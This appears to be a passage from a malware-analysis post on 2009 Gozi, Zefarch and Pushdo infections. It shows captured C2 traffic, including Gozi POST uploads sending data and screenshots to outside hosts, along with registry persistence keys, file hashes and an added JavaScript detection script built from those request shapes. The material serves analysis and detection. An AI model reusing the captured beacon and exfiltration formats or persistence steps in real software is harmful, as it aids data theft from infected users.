POST /cgi-bin/ccc.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28cd6f28cd6f28cd6f
User-Agent: IE
Host: 91.207.61.44
Content-Length: 305
Cache-Control: no-cache

----------------------------28cd6f28cd6f28cd6f

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream


0S...0...*.H.. .......0.0;0.0...+........z(W...g*{....5&.............*...Z...18m.....

----------------------------28cd6f28cd6f28cd6f--


************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28ea2e28ea2e28ea2e
User-Agent: IE
Host: 91.207.61.44
Content-Length: 263
Cache-Control: no-cache


----------------------------28ea2e28ea2e28ea2e
Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream

URL: https://212.117.165.54/put.php

load=1
----------------------------28ea2e28ea2e28ea2e--

************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------297799297799297799
User-Agent: IE
Host: 91.207.61.44
Content-Length: 3494
Cache-Control: no-cache


----------------------------297799297799297799

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"

Content-Type: application/octet-stream

URL: https://212.117.165.54/put.php

type=jpg&img=[image data omitted]

************************************************************************

POST /cgi-bin/fd.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------2a3ea22a3ea22a3ea2
User-Agent: IE
Host: 91.207.61.44
Content-Length: 266
Cache-Control: no-cache

----------------------------2a3ea22a3ea22a3ea2

Content-Disposition: form-data; name="upload_file"; filename="2232068885.16"
Content-Type: application/octet-stream


URL: https://212.117.165.54/put.php

confirm=1

----------------------------2a3ea22a3ea22a3ea2--

************************************************************************

wpv781239024633.exe (Zefarch)
The Temp file wpv781239024633.exe creates a Trojan.Zefarch variant. The malware monitors connections to various search engines and redirects search results to adware and malicious websites. The Temp file wpv781239024633.exe creates:

C:\WINDOWS\psbdxt.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Wjite"
Type: REG_BINARY
Data: 43, 01, 38, 03, 58, 05, 51, 07, 41, 09, 44, 0B, 48, 0D, 41, 0F, 47, 11, 41, 13, 48, 15, 66, 17, 6B, 19, 78, 1B, 78, 1D, 66, 1F, 54, 21, 0C, 23, 40, 25, 4A, 27, 44, 29, 2A, 2B
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Rzuwewi "Xlaheko"
Type: REG_SZ
Data: 61

wpv941239875139.exe (Pushdo)
The Temp file wpv941239875139.exe creates a Pushdo/Pandex/Cutwail variant. The malware serves as a spambot. It creates a file in the user profile directory with the same name as the profile itself; in this example, John.exe was created.

Creates:
C:\Documents and Settings\John\John.exe

A registry key is created to launch the malware at startup:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "John"
Type: REG_SZ
Data: C:\Documents and Settings\John\John.exe /i

The malware connected to 94.247.2.95 (Latvia) for C2.

GET /40E8001430303030303030303030303030303030303031306C0000009666000000007600000642EB00053059707A82 HTTP/1.0
Content-Type: application/octet-stream
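
The captures in this section (the digiwet.dll controller.php check-in, the downloader's bt.php poll, the Gozi cgi-bin beacons and multipart uploads, and the Pushdo GET with a long hex path over HTTP/1.0) each have a request shape that is more durable than the IP addresses, which rotated during the campaign. The following JavaScript (Node) is an added example, not code from the original post; it parses a raw request head and matches it against signatures derived from those captures. The request heads in the block are copied from the captures above (the benign one is constructed), and the signature names and function names are my own.

```javascript
// Added example (not from the original post): classify captured HTTP request
// heads against signatures derived from the post's C2 traffic.

// Parse a request head (request line + headers) into a simple object.
function parseRequestHead(text) {
  const lines = text.trim().split(/\r?\n/);
  const [method, path, version] = lines[0].trim().split(/\s+/);
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i < 0) break; // first non-header line ends the head
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, path, version: version || '', headers };
}

// Each signature keys on request structure rather than on host or IP.
const SIGNATURES = [
  { name: 'gumblar-bot-checkin',
    match: r => /^\/new\/controller\.php\?action=(bot|report)(&|$)/.test(r.path) },
  { name: 'downloader-poll',
    match: r => /^\/bt\.php\?mod=[^&]*&id=[^&]*&up=\d+&mid=/.test(r.path) },
  { name: 'gozi-beacon',
    match: r => /^\/cgi-bin\/\w+\.cgi\?user_id=\d+&version_id=\d+&passphrase=/.test(r.path) },
  { name: 'gozi-upload',
    match: r => r.method === 'POST' && /^\/cgi-bin\/\w+\.cgi$/.test(r.path) && r.headers['user-agent'] === 'IE' },
  { name: 'pushdo-hex-get',
    // A GET with a 40+ character uppercase-hex path, HTTP/1.0 and a Content-Type header on a GET.
    match: r => r.method === 'GET' && /^\/[0-9A-F]{40,}$/.test(r.path) && r.version === 'HTTP/1.0' && 'content-type' in r.headers },
];

// Returns the names of every signature the request head matches.
function classifyRequest(text) {
  const req = parseRequestHead(text);
  return SIGNATURES.filter(s => s.match(req)).map(s => s.name);
}

// Request heads copied from the captures in the post; `benign` is constructed.
const CAPTURED_HEADS = {
  gumblar: `GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=3970894049&rnd=981633 HTTP/1.1
Host: 78.109.29.112`,
  downloader: `GET /bt.php?mod=&id=computername_-324073247&up=2667859&mid=soboc43 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: af9f440dcc.com`,
  goziGet: `GET /cgi-bin/commm.cgi?user_id=2232068885&version_id=16&passphrase=fkjvhsdvlksdhvlsd&socks=2149&version=125&crc=00000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 91.207.61.44`,
  goziPost: `POST /cgi-bin/ppp.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------28c6e728c6e728c6e7
User-Agent: IE
Host: 91.207.61.44
Content-Length: 231`,
  pushdo: `GET /40E8001430303030303030303030303030303030303031306C0000009666000000007600000642EB00053059707A82 HTTP/1.0
Content-Type: application/octet-stream`,
  benign: `GET /index.html HTTP/1.1
Host: www.example.org
User-Agent: Mozilla/5.0`,
};

for (const [label, head] of Object.entries(CAPTURED_HEADS)) {
  console.log(label, '->', JSON.stringify(classifyRequest(head)));
}
```

These rules are specific to the 2009 captures and will not match later builds of the same families; the point is the method, deriving a structural rule (path shape, odd header combinations, a bare "IE" user agent) from a capture so that the rule survives the next change of hosting. Run it over proxy or IDS request logs split per request, and keep the host and IP indicators in the post as a separate, shorter-lived list.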


Filename               Size (bytes)  MD5
741l3.exe              72704         03aaccd01330f844d6c601df997fc1ff
9129837.exe            33792         096ffe693647f1ad8b2e86a8b7f05b44
crypts.dll             33280         1e6d7d0dcb2afcbf20b676f0992057bb
digiwet.dll            18432         3a1d598473469887fd0ed651b7ca96b8
flash.swf              16588         609d207cf010cbda0fcde027301cbd0e
John.exe               20451         eda1b7d3cdb3fb1a1c4e4ba2b51b46a7
load.exe               18432         4c328c15f6e8603f713fdacf7dac6e87
new_drv.sys            8192          a54de1d46ff7bdefbf9d9284c1916c5e
psbdxt.dll             45568         e075c7258f38b6581277552db80659f3
readme.pdf             15964         3e8da97b9f4da49498dfa31ae1c5c342
wpv451239013964.exe    84480         29d9286c42074702a96d94138a092450
wpv781239024633.exe    45568         27a9a6570b53d3dc1e9a24317f6f6fa6
